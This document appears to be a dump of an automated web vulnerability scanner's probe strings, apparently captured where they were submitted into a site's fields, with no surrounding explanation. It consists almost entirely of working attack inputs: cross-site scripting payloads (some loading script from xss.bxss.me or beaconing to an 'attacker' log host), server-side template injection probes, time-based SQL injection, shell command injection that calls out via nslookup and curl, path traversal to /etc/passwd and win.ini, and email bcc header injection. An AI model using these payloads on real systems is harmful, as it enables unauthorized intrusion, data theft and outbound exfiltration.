555<input autofocus onfocus=Q9ef(9773)>

555<img src=xyz OnErRor=gI4s(9451)>

dfb{{98991*97996}}xca

555<img src=xyz OnErRor=YKsX(9189)>

555

555<ScRiPt >a0sH(9663)</ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%54%55%4A%6A%289051%29%3C%2F%73%43%72%69%70%54%3E

<th:t="${dfb}#foreach

555

555\u003CScRiPt\1S8n(9620)\u003C/sCripT\u003E

555<ifRAme sRc=9272.com></IfRamE>

555<img/src=">" onerror=alert(9074)>

dfb[[${98991*97996}]]xca

<a HrEF=http://xss.bxss.me></a>

dfb{{98991*97996}}xca

555<WNMZDJ>PPYDS[!+!]</WNMZDJ>

555\u003CScRiPt\TUJj(9441)\u003C/sCripT\u003E

555

555<img/src=">" onerror=alert(9274)>

dfb__${98991*97996}__::.x

555<aqB9bYb x=9268>

%35%35%35%3C%53%63%52%69%50%74%20%3E%67%49%34%73%289475%29%3C%2F%73%43%72%69%70%54%3E

<th:t="${dfb}#foreach

555&lt

555&lt

555<script>a0sH(9801)</script>

<a HrEF=jaVaScRiPT:>

dfb[[${98991*97996}]]xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

%35%35%35%3C%53%63%52%69%50%74%20%3E%59%4B%73%58%289123%29%3C%2F%73%43%72%69%70%54%3E

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<img sRc='http://attacker-9303/log.php?

\xf6<img zzz onmouseover=TUJj(94551) //\xf6>

555

555\u003CScRiPt\YKsX(9561)\u003C/sCripT\u003E

555}body{zzz:Expre/**/SSion(Q9ef(9035))}

555\u003CScRiPt\gI4s(9286)\u003C/sCripT\u003E

\xf6<img zzz onmouseover=1S8n(94491) //\xf6>

555<ScR<ScRiPt>IpT>a0sH(9762)</sCr<ScRiPt>IpT>

dfb__${98991*97996}__::.x

555<ScRiPt >VzOQ(9765)</ScRiPt>

555

555<aaooj9X<

555<input autofocus onfocus=TUJj(9193)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555&lt

555<ScRiPt >a0sH(9345)</ScRiPt>

555<input autofocus onfocus=1S8n(9394)>

dfb{{98991*97996}}xca

555<W1YPL0>ATELA[!+!]</W1YPL0>

555&lt

555aF5dH <ScRiPt >Q9ef(9522)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<script>VzOQ(9672)</script>

<a HrEF=http://xss.bxss.me></a>

555

\xf6<img zzz onmouseover=gI4s(94991) //\xf6>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9734></ScRiPt>

<a HrEF=http://xss.bxss.me></a>

<a HrEF=jaVaScRiPT:>

dfb[[${98991*97996}]]xca

\xf6<img zzz onmouseover=YKsX(92601) //\xf6>

555<WJM05F>IR5R2[!+!]</WJM05F>

555<ScRiPt >kpwe(9241)</ScRiPt>

555}body{zzz:Expre/**/SSion(TUJj(9027))}

555<ScR<ScRiPt>IpT>VzOQ(9143)</sCr<ScRiPt>IpT>

dfb{{98991*97996}}xca

555<input autofocus onfocus=gI4s(9071)>

555<ScRiPt >a0sH(9526)</ScRiPt>

<a HrEF=jaVaScRiPT:>

555<input autofocus onfocus=YKsX(9904)>

555<svg \xa0onload=a0sH(9092)

555f0sfE <ScRiPt >TUJj(9043)</ScRiPt>

dfb__${98991*97996}__::.x

555<ifRAme sRc=9764.com></IfRamE>

555<WJ7MDO>QGQ7J[!+!]</WJ7MDO>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

<a HrEF=http://xss.bxss.me></a>

555<ScRiPt >VzOQ(9604)</ScRiPt>

dfb[[${98991*97996}]]xca

<a HrEF=http://xss.bxss.me></a>

555}body{zzz:Expre/**/SSion(1S8n(9047))}

555<script>kpwe(9962)</script>

555<aaPxIwR x=9913>

dfb__${98991*97996}__::.x

555<isindex type=image src=1 onerror=a0sH(9807)>

555<WDW5XR>NYH0B[!+!]</WDW5XR>

555<ScRiPt >FRzf(9058)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

<a HrEF=jaVaScRiPT:>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9479></ScRiPt>

<a HrEF=jaVaScRiPT:>

555I9CQI <ScRiPt >1S8n(9923)</ScRiPt>

555<ScR<ScRiPt>IpT>kpwe(9198)</sCr<ScRiPt>IpT>

555<img sRc='http://attacker-9178/log.php?

555<iframe src='data:text/html

555<akugzw2<

555<ifRAme sRc=9134.com></IfRamE>

555<WGAULP>RDTOM[!+!]</WGAULP>

555<ScRiPt >TBnb(9998)</ScRiPt>

555}body{zzz:Expre/**/SSion(YKsX(9795))}

555<WCRSMT>FWIZ3[!+!]</WCRSMT>

555}body{zzz:Expre/**/SSion(gI4s(9217))}

555<ScRiPt >kpwe(9739)</ScRiPt>

555<body onload=a0sH(9571)>

555<ScRiPt >VzOQ(9201)</ScRiPt>

555<a68rT3P x=9879>

555<svg \xa0onload=VzOQ(9636)

555<ifRAme sRc=9305.com></IfRamE>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9755></ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=a0sH(9963)>

555<W7IGRS>ALI40[!+!]</W7IGRS>

555cKGPj <ScRiPt >YKsX(9762)</ScRiPt>

555kPLvO <ScRiPt >gI4s(9873)</ScRiPt>

555<img sRc='http://attacker-9804/log.php?

555<avfx6VI x=9653>

555<img src=xyz OnErRor=a0sH(9507)>

555<isindex type=image src=1 onerror=VzOQ(9988)>

555<ScRiPt >kpwe(9031)</ScRiPt>

555<script>FRzf(9334)</script>

555<script>TBnb(9643)</script>

555<WYUB55>NP8TL[!+!]</WYUB55>

555<iframe src='data:text/html

555<WUIVCC>EWAYV[!+!]</WUIVCC>

555<awiPKzU<

555<img sRc='http://attacker-9988/log.php?

555<img/src=">" onerror=alert(9430)>

555<ifRAme sRc=9162.com></IfRamE>

555<ScR<ScRiPt>IpT>FRzf(9847)</sCr<ScRiPt>IpT>

555<svg \xa0onload=kpwe(9713)

555<ScR<ScRiPt>IpT>TBnb(9068)</sCr<ScRiPt>IpT>

555<ifRAme sRc=9832.com></IfRamE>

555<isindex type=image src=1 onerror=kpwe(9800)>

555<ScRiPt >FRzf(9482)</ScRiPt>

555<aUiEIoo x=9789>

555<body onload=VzOQ(9207)>

555<aFPmpTk<

%35%35%35%3C%53%63%52%69%50%74%20%3E%61%30%73%48%289593%29%3C%2F%73%43%72%69%70%54%3E

555<ScRiPt >TBnb(9269)</ScRiPt>

555\u003CScRiPt\a0sH(9575)\u003C/sCripT\u003E

555<img src=//xss.bxss.me/t/dot.gif onload=VzOQ(9681)>

555<apH13jP x=9026>

555<img sRc='http://attacker-9588/log.php?

555<iframe src='data:text/html

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9160></ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9226></ScRiPt>

555<body onload=kpwe(9380)>

555<aCRhQj1<

555<img sRc='http://attacker-9570/log.php?

555&lt

555<img src=xyz OnErRor=VzOQ(9344)>

555<img src=//xss.bxss.me/t/dot.gif onload=kpwe(9513)>

555'"()&%<zzz><ScRiPt >nTto(9803)</ScRiPt>

555<ScRiPt >TBnb(9842)</ScRiPt>

555<ScRiPt >FRzf(9773)</ScRiPt>

555<img/src=">" onerror=alert(9636)>

555<aLmzXl9<

\xf6<img zzz onmouseover=a0sH(98271) //\xf6>

'"()&%<zzz><ScRiPt >nTto(9400)</ScRiPt>

555<svg \xa0onload=TBnb(9441)

555<svg \xa0onload=FRzf(9541)

555<img src=xyz OnErRor=kpwe(9307)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%56%7A%4F%51%289967%29%3C%2F%73%43%72%69%70%54%3E

555<isindex type=image src=1 onerror=FRzf(9747)>

555<isindex type=image src=1 onerror=TBnb(9953)>

555<input autofocus onfocus=a0sH(9060)>

5559210766

555<img/src=">" onerror=alert(9133)>

555\u003CScRiPt\VzOQ(9190)\u003C/sCripT\u003E

555<iframe src='data:text/html

555<iframe src='data:text/html

<a HrEF=http://xss.bxss.me></a>

555&lt

%35%35%35%3C%53%63%52%69%50%74%20%3E%6B%70%77%65%289163%29%3C%2F%73%43%72%69%70%54%3E

bfg7926\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7926

555\u003CScRiPt\kpwe(9502)\u003C/sCripT\u003E

555<body onload=TBnb(9326)>

\xf6<img zzz onmouseover=VzOQ(91041) //\xf6>

555<body onload=FRzf(9882)>

<a HrEF=jaVaScRiPT:>

555&lt

bfgx2293\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2293

555<img src=//xss.bxss.me/t/dot.gif onload=TBnb(9485)>

555<img src=//xss.bxss.me/t/dot.gif onload=FRzf(9395)>

555<input autofocus onfocus=VzOQ(9675)>

\xf6<img zzz onmouseover=kpwe(99551) //\xf6>

555}body{zzz:Expre/**/SSion(a0sH(9770))}

<%={{={@{#{${dfb}}%>

<a HrEF=http://xss.bxss.me></a>

555<img src=xyz OnErRor=TBnb(9896)>

555yaX1E <ScRiPt >a0sH(9485)</ScRiPt>

555<img src=xyz OnErRor=FRzf(9024)>

555<img/src=">" onerror=alert(9871)>

555<WEPMMZ>BZ8EW[!+!]</WEPMMZ>

<a HrEF=jaVaScRiPT:>

555<input autofocus onfocus=kpwe(9098)>

555

555<img/src=">" onerror=alert(9691)>

<th:t="${dfb}#foreach

<a HrEF=http://xss.bxss.me></a>

555<ifRAme sRc=9583.com></IfRamE>

555}body{zzz:Expre/**/SSion(VzOQ(9808))}

555'"()&%<zzz><ScRiPt >8BV6(9424)</ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%54%42%6E%62%289864%29%3C%2F%73%43%72%69%70%54%3E

%35%35%35%3C%53%63%52%69%50%74%20%3E%46%52%7A%66%289413%29%3C%2F%73%43%72%69%70%54%3E

555'"()&%<zzz><ScRiPt >QyFA(9424)</ScRiPt>

555

<a HrEF=jaVaScRiPT:>

555<aZy0fqW x=9962>

555\u003CScRiPt\TBnb(9844)\u003C/sCripT\u003E

555CtSMl <ScRiPt >VzOQ(9450)</ScRiPt>

555<img sRc='http://attacker-9395/log.php?

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555}body{zzz:Expre/**/SSion(kpwe(9886))}

'"()&%<zzz><ScRiPt >8BV6(9862)</ScRiPt>

555\u003CScRiPt\FRzf(9885)\u003C/sCripT\u003E

'"()&%<zzz><ScRiPt >QyFA(9725)</ScRiPt>

555&lt

555<WQAE8L>3GA7O[!+!]</WQAE8L>

5559365947

555Cv4JE <ScRiPt >kpwe(9188)</ScRiPt>

555<aEfjLvp<

555

555&lt

555<ifRAme sRc=9096.com></IfRamE>

\xf6<img zzz onmouseover=TBnb(93001) //\xf6>

5559752036

\xf6<img zzz onmouseover=FRzf(94951) //\xf6>

bfg9869\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl9869

555<WBSXVW>J8ZB6[!+!]</WBSXVW>

555<auZghSF x=9602>

bfg3147\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl3147

dfb{{98991*97996}}xca

555<ifRAme sRc=9938.com></IfRamE>

555<img sRc='http://attacker-9701/log.php?

555<input autofocus onfocus=FRzf(9519)>

bfgx1354\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1354

555<input autofocus onfocus=TBnb(9892)>

dfb[[${98991*97996}]]xca

bfgx6148\xc0\xbez1\xc0\xbcz2a\x90bcxhjl6148

555<a9XQtMe x=9783>

555<aePabMl<

<a HrEF=http://xss.bxss.me></a>

<a HrEF=http://xss.bxss.me></a>

<%={{={@{#{${dfb}}%>

555

<a HrEF=jaVaScRiPT:>

555'"()&%<zzz><ScRiPt >9NcR(9216)</ScRiPt>

dfb__${98991*97996}__::.x

<%={{={@{#{${dfb}}%>

<a HrEF=jaVaScRiPT:>

555<img sRc='http://attacker-9971/log.php?

'"()&%<zzz><ScRiPt >9NcR(9251)</ScRiPt>

555}body{zzz:Expre/**/SSion(TBnb(9303))}

555}body{zzz:Expre/**/SSion(FRzf(9283))}

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<aB5nLXG<

555

dfb{{98991*97996}}xca

555r3Xo5 <ScRiPt >TBnb(9429)</ScRiPt>

5559387534

555zFUNR <ScRiPt >FRzf(9125)</ScRiPt>

555<ScRiPt >nTto(9876)</ScRiPt>

555'"()&%<zzz><ScRiPt >moHx(9151)</ScRiPt>

<th:t="${dfb}#foreach

dfb{{98991*97996}}xca

555<WJYCRX>JG7RU[!+!]</WJYCRX>

555<WHF4DQ>PTVYI[!+!]</WHF4DQ>

555<WUHZOS>GESVS[!+!]</WUHZOS>

bfg3067\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl3067

'"()&%<zzz><ScRiPt >moHx(9101)</ScRiPt>

555<ifRAme sRc=9874.com></IfRamE>

555

dfb{98991*97996}xca

555<ifRAme sRc=9319.com></IfRamE>

555<script>nTto(9460)</script>

bfgx7738\xc0\xbez1\xc0\xbcz2a\x90bcxhjl7738

5559204593

dfb${98991*97996}xca

dfb{{98991*97996}}xca

bfg5084\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5084

555<aLl7HA5 x=9813>

<%={{={@{#{${dfb}}%>

555<ScR<ScRiPt>IpT>nTto(9547)</sCr<ScRiPt>IpT>

dfb#{98991*97996}xca

555<aN0gIP0 x=9192>

555<img sRc='http://attacker-9448/log.php?

dfb{{98991*97996}}xca

bfgx9711\xc0\xbez1\xc0\xbcz2a\x90bcxhjl9711

555

555'"()&%<zzz><ScRiPt >S8bw(9603)</ScRiPt>

555'"()&%<zzz><ScRiPt >ThWw(9061)</ScRiPt>

555<asDuyHY<

555<ScRiPt >nTto(9053)</ScRiPt>

dfb{#98991*97996}xca

555<img sRc='http://attacker-9989/log.php?

555

'"()&%<zzz><ScRiPt >ThWw(9319)</ScRiPt>

<%={{={@{#{${dfb}}%>

dfb{98991*97996}xca

555<awqPp5X<

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9699></ScRiPt>

dfb{{98991*97996}}xca

'"()&%<zzz><ScRiPt >S8bw(9592)</ScRiPt>

dfb{@98991*97996}xca

5559193426

555<ScRiPt >nTto(9857)</ScRiPt>

dfb${98991*97996}xca

5559370826

<th:t="${dfb}#foreach

dfb{{98991*97996}}xca

bfg2973\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2973

555<svg \xa0onload=nTto(9223)

dfb{{=98991*97996}}xca

dfb#{98991*97996}xca

bfg8285\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl8285

dfb@(98991*97996)xca

bfgx7175\xc0\xbez1\xc0\xbcz2a\x90bcxhjl7175

555

dfb{98991*97996}xca

555'"()&%<zzz><ScRiPt >G86H(9914)</ScRiPt>

bfgx2800\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2800

555<isindex type=image src=1 onerror=nTto(9207)>

dfb{#98991*97996}xca

555'"()&%<zzz><ScRiPt >RvEc(9537)</ScRiPt>

<%={{={@{#{${dfb}}%>

dfb${98991*97996}xca

<%={{={@{#{${dfb}}%>

dfb{@98991*97996}xca

555

'"()&%<zzz><ScRiPt >RvEc(9894)</ScRiPt>

555<iframe src='data:text/html

'"()&%<zzz><ScRiPt >G86H(9853)</ScRiPt>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb<%=98991*97996%>xca

dfb{{=98991*97996}}xca

<th:t="${dfb}#foreach

555

5559700071

555<body onload=nTto(9348)>

5559295415

555

dfb#{98991*97996}xca

dfb@(98991*97996)xca

bfg7129\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7129

bfg6025\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl6025

dfb#set($x=98991*97996)${x}xca

555

<th:t="${dfb}#foreach

dfb{#98991*97996}xca

dfb{{98991*97996}}xca

555<img src=//xss.bxss.me/t/dot.gif onload=nTto(9414)>

dfb{{"abc"|title}}xca

bfgx5171\xc0\xbez1\xc0\xbcz2a\x90bcxhjl5171

bfgx10352\xc0\xbez1\xc0\xbcz2a\x90bcxhjl10352

dfb<%=98991*97996%>xca

555

555<img src=xyz OnErRor=nTto(9754)>

dfb[[${98991*97996}]]xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb{@98991*97996}xca

dfb#set($x=98991*97996)${x}xca

555<img/src=">" onerror=alert(9486)>

<%={{={@{#{${dfb}}%>

<%={{={@{#{${dfb}}%>

print("dfb" . 98991*97996 . "xca")

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb__${98991*97996}__::.x

dfb{{"abc"|title}}xca

%35%35%35%3C%53%63%52%69%50%74%20%3E%6E%54%74%6F%289470%29%3C%2F%73%43%72%69%70%54%3E

<th:t="${dfb}#foreach

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

98991*97996*98991*97996

555

dfb{{=98991*97996}}xca

print("dfb" . 98991*97996 . "xca")

555

dfb{{98991*97996}}xca

555<ScRiPt >moHx(9786)</ScRiPt>

555

dfb{{98991*97996}}xca

dfb[[${98991*97996}]]xca

<th:t="${dfb}#foreach

dfb{@math key=98991 method="multiply" operand=97996/}xca

dfb[[${98991*97996}]]xca

555

dfb{{{this}}}xca

555<W3OHN0>3PUVS[!+!]</W3OHN0>

555\u003CScRiPt\nTto(9235)\u003C/sCripT\u003E

dfb__${98991*97996}__::.x

555&lt

555

98991*97996*98991*97996

555<script>moHx(9197)</script>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb{@math key=98991 method="multiply" operand=97996/}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb__${98991*97996}__::.x

dfb@(98991*97996)xca

555<ScR<ScRiPt>IpT>moHx(9328)</sCr<ScRiPt>IpT>

555

dfb<%=98991*97996%>xca

555<ScRiPt >ThWw(9975)</ScRiPt>

\xf6<img zzz onmouseover=nTto(93821) //\xf6>

#{98991*97996*98991*97996}

555<ScRiPt >moHx(9416)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9476></ScRiPt>

555

555<WIMEP8>0KY4M[!+!]</WIMEP8>

dfb[[${98991*97996}]]xca

fIQXCDQx

dfb#set($x=98991*97996)${x}xca

dfb#{xca}=123

555<input autofocus onfocus=nTto(9940)>

dfb{{"abc"|title}}xca

dfb{{{this}}}xca

<a HrEF=http://xss.bxss.me></a>

#{98991*97996*98991*97996}

dfb{{98991*97996}}xca

555<ScRiPt >S8bw(9958)</ScRiPt>

dfb#{xca}=123

-1 OR 2+127-127-1=0+0+0+1 --

-1 OR 2+101-101-1=0+0+0+1

555<WW22CB>TVRYX[!+!]</WW22CB>

-1' OR 2+996-996-1=0+0+0+1 --

-1' OR 2+564-564-1=0+0+0+1 or 's2zwBsg5'='

555<script>S8bw(9643)</script>

-1" OR 2+622-622-1=0+0+0+1 --

555<ScR<ScRiPt>IpT>S8bw(9135)</sCr<ScRiPt>IpT>

<a HrEF=jaVaScRiPT:>

555<ScRiPt >moHx(9134)</ScRiPt>

1C5pGiHb2IO

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb[[${98991*97996}]]xca

print("dfb" . 98991*97996 . "xca")

555

555}body{zzz:Expre/**/SSion(nTto(9635))}

dfb{{'abcd'.toUpperCase()}}xca

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

response.write(9290694*9988181)

555<ScRiPt >RvEc(9236)</ScRiPt>

dfb__${98991*97996}__::.x

98991*97996*98991*97996

'+response.write(9290694*9988181)+'

555y7jaj <ScRiPt >nTto(9694)</ScRiPt>

AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

-1

dfb{{98991*97996}}xca

"+response.write(9290694*9988181)+"

555<W3DYZI>09NXO[!+!]</W3DYZI>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb{@math key=98991 method="multiply" operand=97996/}xca

555

555<ScRiPt >S8bw(9668)</ScRiPt>

555<WTDRIJ>NSLEY[!+!]</WTDRIJ>

dfb{{98991*97996}}xca

-1)

echo seduvv$()\ rjpjer\nz^xyu||a #' &echo seduvv$()\ rjpjer\nz^xyu||a #|" &echo seduvv$()\ rjpjer\nz^xyu||a #

dfb[[${98991*97996}]]xca

555

555<script>RvEc(9839)</script>

555<ScRiPt >G86H(9582)</ScRiPt>

dfb{{{this}}}xca

1 waitfor delay '0:0:15' --

&echo gkoswr$()\ ftssfp\nz^xyu||a #' &echo gkoswr$()\ ftssfp\nz^xyu||a #|" &echo gkoswr$()\ ftssfp\nz^xyu||a #

555

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9796></ScRiPt>

555<ifRAme sRc=9922.com></IfRamE>

dfb[[${98991*97996}]]xca

EGssN3br'

555&echo fkqrfs$()\ khhids\nz^xyu||a #' &echo fkqrfs$()\ khhids\nz^xyu||a #|" &echo fkqrfs$()\ khhids\nz^xyu||a #

dfb__${98991*97996}__::.x

YDIB01wZ

555<ScR<ScRiPt>IpT>RvEc(9420)</sCr<ScRiPt>IpT>

555<WXYQMK>82PCK[!+!]</WXYQMK>

#{98991*97996*98991*97996}

-5 OR 758=(SELECT 758 FROM PG_SLEEP(15))--

|echo shzmgw$()\ guzdtm\nz^xyu||a #' |echo shzmgw$()\ guzdtm\nz^xyu||a #|" |echo shzmgw$()\ guzdtm\nz^xyu||a #

555

555 bcc:009247.1872-397082.1872.9ef8f.19887.2@bxss.me

555'"()&%<zzz><ScRiPt >Z9sI(9813)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555|echo vraueh$()\ lcvrqk\nz^xyu||a #' |echo vraueh$()\ lcvrqk\nz^xyu||a #|" |echo vraueh$()\ lcvrqk\nz^xyu||a #

-5) OR 977=(SELECT 977 FROM PG_SLEEP(15))--

555<ScRiPt >S8bw(9950)</ScRiPt>

555<aKwtWdO x=9941>

dfb__${98991*97996}__::.x

../../../../../../../../../../../../../../etc/passwd

-1)) OR 155=(SELECT 155 FROM PG_SLEEP(15))--

DD7jjLIa' OR 12=(SELECT 12 FROM PG_SLEEP(15))--

../../../../../../../../../../../../../../windows/win.ini

555<script>G86H(9505)</script>

555<ScRiPt >RvEc(9144)</ScRiPt>

(nslookup -q=cname hitgkdwqtouiabbac3.bxss.me||curl hitgkdwqtouiabbac3.bxss.me))

to@example.com> bcc:009247.1872-397083.1872.9ef8f.19887.2@bxss.me

dfb#{xca}=123

555<ScRiPt >8BV6(9432)</ScRiPt>

$(nslookup -q=cname hitbytistebnja45e8.bxss.me||curl hitbytistebnja45e8.bxss.me)

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9816></ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555

'"()&%<zzz><ScRiPt >Z9sI(9549)</ScRiPt>

555<svg \xa0onload=S8bw(9403)

555<img sRc='http://attacker-9417/log.php?

file:///etc/passwd

YX8q15iY') OR 358=(SELECT 358 FROM PG_SLEEP(15))--

555<ScR<ScRiPt>IpT>G86H(9269)</sCr<ScRiPt>IpT>

&nslookup -q=cname hitcxxchlcqyy633d1.bxss.me&'\"`0&nslookup -q=cname hitcxxchlcqyy633d1.bxss.me&`'

555<acADTJ4<

555<isindex type=image src=1 onerror=S8bw(9074)>

5559864324

555<WV5TM0>UFAKJ[!+!]</WV5TM0>

dfb{{'abcd'.toUpperCase()}}xca

tnMuY6mc')) OR 917=(SELECT 917 FROM PG_SLEEP(15))--

555

555

&(nslookup -q=cname hitvhfsoidbadb65df.bxss.me||curl hitvhfsoidbadb65df.bxss.me)&'\"`0&(nslookup -q=cname hitvhfsoidbadb65df.bxss.me||curl hitvhfsoidbadb65df.bxss.me)&`'

555<ScRiPt >QyFA(9537)</ScRiPt>

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

../555

555

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

|(nslookup -q=cname hitnvlgmvqkaj890ed.bxss.me||curl hitnvlgmvqkaj890ed.bxss.me)

555<ScRiPt >G86H(9844)</ScRiPt>

555<ScRiPt >RvEc(9551)</ScRiPt>

555<script>8BV6(9569)</script>

12345'"\'\")

555

555<WXYJTQ>ZORVV[!+!]</WXYJTQ>

`(nslookup -q=cname hitwoziripoes75a36.bxss.me||curl hitwoziripoes75a36.bxss.me)`

bfg8032\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl8032

555<iframe src='data:text/html

AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

1'"

555

555<svg \xa0onload=RvEc(9843)

555<ScR<ScRiPt>IpT>8BV6(9907)</sCr<ScRiPt>IpT>

555<script>QyFA(9039)</script>

555

555

555

555<ScRiPt >8BV6(9966)</ScRiPt>

555<isindex type=image src=1 onerror=RvEc(9763)>

555<body onload=S8bw(9334)>

555

1\xc0\xa7\xc0\xa2%2527%2522

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9119></ScRiPt>

bfgx9160\xc0\xbez1\xc0\xbcz2a\x90bcxhjl9160

555<isindex type=image src=1 onerror=moHx(9122)>

dfb{{98991*97996}}xca

555<ScR<ScRiPt>IpT>QyFA(9910)</sCr<ScRiPt>IpT>

555

555<esi:include src="http://bxss.me/rpb.png"/>

@@CAlMF

555<ScRiPt >G86H(9163)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9715></ScRiPt>

555

555

555

555

dfb[[${98991*97996}]]xca

<%={{={@{#{${dfb}}%>

555<ScRiPt >QyFA(9702)</ScRiPt>

555<iframe src='data:text/html

555<img src=//xss.bxss.me/t/dot.gif onload=S8bw(9160)>

555

555<iframe src='data:text/html

555

${9999325+9999782}

555

555<ScRiPt >8BV6(9156)</ScRiPt>

555

555

555<body onload=RvEc(9567)>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9205></ScRiPt>

555

555<svg \xa0onload=G86H(9299)

555

555

555

dfb__${98991*97996}__::.x

555<img src=xyz OnErRor=S8bw(9238)>

555<body onload=moHx(9078)>

555<ScRiPt >QyFA(9197)</ScRiPt>

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

555

555

555

555<svg \xa0onload=8BV6(9215)

555<img src=//xss.bxss.me/t/dot.gif onload=moHx(9092)>

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

Http://bxss.me/t/fit.txt

555<img src=//xss.bxss.me/t/dot.gif onload=RvEc(9883)>

<th:t="${dfb}#foreach

555<isindex type=image src=1 onerror=G86H(9656)>

555'"()&%<zzz><ScRiPt >DXE9(9466)</ScRiPt>

555

555&n951682=v920435

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<img/src=">" onerror=alert(9341)>

555<svg \xa0onload=QyFA(9261)

555<img src=xyz OnErRor=moHx(9836)>

555<isindex type=image src=1 onerror=8BV6(9752)>

555<iframe src='data:text/html

555<img src=xyz OnErRor=RvEc(9132)>

http://bxss.me/t/fit.txt?.jpg

555

555

555

/etc/shells

555'"()&%<zzz><ScRiPt >hXkE(9585)</ScRiPt>

555<body onload=G86H(9890)>

555<img/src=">" onerror=alert(9635)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%53%38%62%77%289659%29%3C%2F%73%43%72%69%70%54%3E

555<ScRiPt >9NcR(9390)</ScRiPt>

)

555

'"()&%<zzz><ScRiPt >DXE9(9432)</ScRiPt>

555

555

555<isindex type=image src=1 onerror=QyFA(9358)>

555<iframe src='data:text/html

c:/windows/win.ini

555<W62UO6>YOQBT[!+!]</W62UO6>

'"()&%<zzz><ScRiPt >hXkE(9900)</ScRiPt>

555<img/src=">" onerror=alert(9489)>

!(()&&!|*|*|

555

555

bxss.me

555\u003CScRiPt\S8bw(9350)\u003C/sCripT\u003E

5559518571

%35%35%35%3C%53%63%52%69%50%74%20%3E%6D%6F%48%78%289242%29%3C%2F%73%43%72%69%70%54%3E

555<iframe src='data:text/html

555<img src=//xss.bxss.me/t/dot.gif onload=G86H(9631)>

^(#$!@#$)(()))******

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555

555<body onload=8BV6(9602)>

555

555\u003CScRiPt\moHx(9702)\u003C/sCripT\u003E

bfg5118\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5118

555

555<script>9NcR(9720)</script>

555

555

555<img src=xyz OnErRor=G86H(9633)>

5559176247

%35%35%35%3C%53%63%52%69%50%74%20%3E%52%76%45%63%289641%29%3C%2F%73%43%72%69%70%54%3E

555

555

555&lt

555

555<body onload=QyFA(9265)>

555

555<img src=//xss.bxss.me/t/dot.gif onload=8BV6(9989)>

555

bfgx2220\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2220

555<ScR<ScRiPt>IpT>9NcR(9413)</sCr<ScRiPt>IpT>

555

555&lt

